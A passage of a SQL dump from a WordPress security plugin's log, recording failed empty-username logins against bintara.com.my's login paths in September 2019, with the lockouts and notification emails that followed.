Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.170.164.138\";s:11:\"REMOTE_PORT\";s:5:\"39976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5G5ib-UXmq9MAQufFPNgAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567508198.7432\";s:12:\"REQUEST_TIME\";s:10:\"1567508198\";}}','notice','2019-09-03 10:56:41','2019-09-03 10:56:39',18203024,19501464,'https://bintara.com.my/xmlrpc.php',1,0,'178.170.164.138'),(26088,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtWliJ7D9Gn7wDPh8kjQAAAMg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"50.63.12.204\";s:11:\"REMOTE_PORT\";s:5:\"56792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtWliJ7D9Gn7wDPh8kjQAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074522.6564\";s:12:\"REQUEST_TIME\";s:10:\"1569074522\";}}','notice','2019-09-21 14:02:04','2019-09-21 14:02:03',17848600,19338464,'https://bintara.com.my/wordpress/wp-login.php',1,0,'50.63.12.204'),(26089,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtWnkXpgmG5P@iB8k5LgAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"146.255.101.216\";s:11:\"REMOTE_PORT\";s:5:\"45657\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtWnkXpgmG5P@iB8k5LgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074523.0723\";s:12:\"REQUEST_TIME\";s:10:\"1569074523\";}}','notice','2019-09-21 14:02:04','2019-09-21 14:02:03',17846712,19337312,'https://bintara.com.my/wp/wp-login.php',1,0,'146.255.101.216'),(26090,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtXLfBTP0kPOVnb8jwtQAAAFg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"191.252.96.53\";s:11:\"REMOTE_PORT\";s:5:\"38378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtXLfBTP0kPOVnb8jwtQAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074524.4117\";s:12:\"REQUEST_TIME\";s:10:\"1569074524\";}}','notice','2019-09-21 14:02:05','2019-09-21 14:02:04',17845528,19336856,'https://bintara.com.my/wp/wp-login.php',1,0,'191.252.96.53'),(26091,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:02:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:02:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:02:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:02:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:02:05','2019-09-21 14:02:04',17930336,19336856,'https://bintara.com.my/wp/wp-login.php',1,0,'191.252.96.53'),(26092,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:02:05','2019-09-21 14:02:04',18136688,19336856,'https://bintara.com.my/wp/wp-login.php',1,0,'191.252.96.53'),(26093,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtf3kXpgmG5P@iB8k5RgAAAIs\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.0.120.26\";s:11:\"REMOTE_PORT\";s:5:\"45856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtf3kXpgmG5P@iB8k5RgAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074559.3844\";s:12:\"REQUEST_TIME\";s:10:\"1569074559\";}}','notice','2019-09-21 14:02:40','2019-09-21 14:02:39',17846936,19337064,'https://bintara.com.my/2019/wp-login.php',1,0,'81.0.120.26'),(26094,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:02:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:02:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:02:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:02:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:02:40','2019-09-21 14:02:39',17931864,19337064,'https://bintara.com.my/2019/wp-login.php',1,0,'81.0.120.26'),(26095,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:02:40','2019-09-21 14:02:39',18138152,19337064,'https://bintara.com.my/2019/wp-login.php',1,0,'81.0.120.26'),(26096,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtnViJ7D9Gn7wDPh8kmgAAAMI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.85.105\";s:11:\"REMOTE_PORT\";s:5:\"45763\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtnViJ7D9Gn7wDPh8kmgAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074589.6979\";s:12:\"REQUEST_TIME\";s:10:\"1569074589\";}}','notice','2019-09-21 14:03:10','2019-09-21 14:03:10',17847688,19338032,'https://bintara.com.my/test/wp-login.php',1,0,'159.65.85.105'),(26097,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:03:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:03:10\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:03:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:03:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:03:10','2019-09-21 14:03:10',17932368,19338032,'https://bintara.com.my/test/wp-login.php',1,0,'159.65.85.105'),(26098,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:03:10','2019-09-21 14:03:10',18138880,19338032,'https://bintara.com.my/test/wp-login.php',1,0,'159.65.85.105'),(26099,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtoXkXpgmG5P@iB8k5XgAAAIs\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.185.255\";s:11:\"REMOTE_PORT\";s:5:\"41396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtoXkXpgmG5P@iB8k5XgAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074593.5164\";s:12:\"REQUEST_TIME\";s:10:\"1569074593\";}}','notice','2019-09-21 14:03:14','2019-09-21 14:03:13',17848240,19338088,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.185.255'),(26100,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:03:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:03:13\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:03:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:03:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:03:14','2019-09-21 